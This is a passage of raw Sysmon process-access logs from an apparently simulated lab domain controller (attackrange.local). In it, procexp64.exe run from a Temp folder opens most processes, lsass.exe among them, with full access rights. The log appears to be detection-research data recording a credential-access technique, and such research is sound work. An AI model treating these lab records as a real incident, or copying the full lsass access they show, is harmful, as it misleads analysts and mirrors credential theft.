Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785116Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785115Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785114Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785113Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785112Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785111Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785110Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785109Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785108Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785107Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785106Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785105Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785104Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785103Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785102Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785101Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785100Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785099Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785098Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785097Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785096Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785095Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785094Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785093Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785092Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785091Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785090Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:47.159{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785213Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785212Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785211Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785210Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785209Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785208Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785207Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785206Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785205Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785204Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:48.190{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785203Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 